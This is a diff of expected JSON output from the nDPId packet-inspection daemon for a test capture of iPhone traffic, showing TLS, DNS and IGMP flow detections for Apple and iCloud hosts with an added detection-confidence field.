+00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-03591{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}}
+00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+03617{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalueservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}}
 00534{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454599054,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":54,"pkt_l4_len":16,"ts_msec":1582454599054,"pkt":"AQBeAAAWxGGLNYKpCABGAAAoAABAAAECQgDAqAIR4AAAFpQEAAAiAPkCAAAAAQQAAADgAAD7"}
-00567{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1582454599065,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1582454599065,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7Z5IAAP8RzrzAqAIRwKgCAfLQADUAJ+lbzwoBAAABAAAAAAAAA2dzYQVhcHBsZQNjb20AAAEAAQ=="}
-00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599065,"flow_last_seen":1582454599065,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454599065,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1582454599073,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1582454599073,"pkt":"xiwDYGpkxGGLNYKpCABFAAA7y\/EAAP8Ral3AqAIRwKgCAcs\/ADUAJ2vSdCUBAAABAAAAAAAAA2dzYQVhcHBsZQNjb20AAAEAAQ=="}
-00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599073,"flow_last_seen":1582454599073,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1582454599073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABxJf8AAEARzxrAqAIBwKgCEQA18tAAXXwrzwqBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="}
-00742{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}}
+00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}}
 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1582454599105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"ts_msec":1582454599105,"pkt":"xGGLNYKpxiwDYGpkCABFAABx6W4AAEARC6vAqAIBwKgCEQA1yz8AXf6hdCWBgAABAAIAAAAAA2dzYQVhcHBsZQNjb20AAAEAAcAMAAUAAQAAEZYAGgNnc2EFYXBwbGUDY29tBmFrYWRucwNuZXQAwCsAAQABAAAA4QAEEYmmIw=="}
-00742{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1582454599105,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsa.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.137.166.35"}}
